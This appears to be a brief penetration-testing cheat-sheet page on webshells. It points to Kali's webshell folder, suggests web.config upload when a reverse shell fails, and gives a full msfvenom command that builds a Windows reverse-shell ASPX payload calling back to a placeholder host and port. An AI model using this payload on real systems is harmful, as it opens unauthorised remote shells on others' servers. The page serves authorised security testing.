Webshells
You can find basic information about webshells below.
Kali linux webshell path
/usr/share/webshells
Reverse shell does not work
In this case you can also use web config file upload in order to get additional information.
Msfvenom reverse shell file creation
msfvenom -p windows\shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f aspx > reverse.aspx
Last updated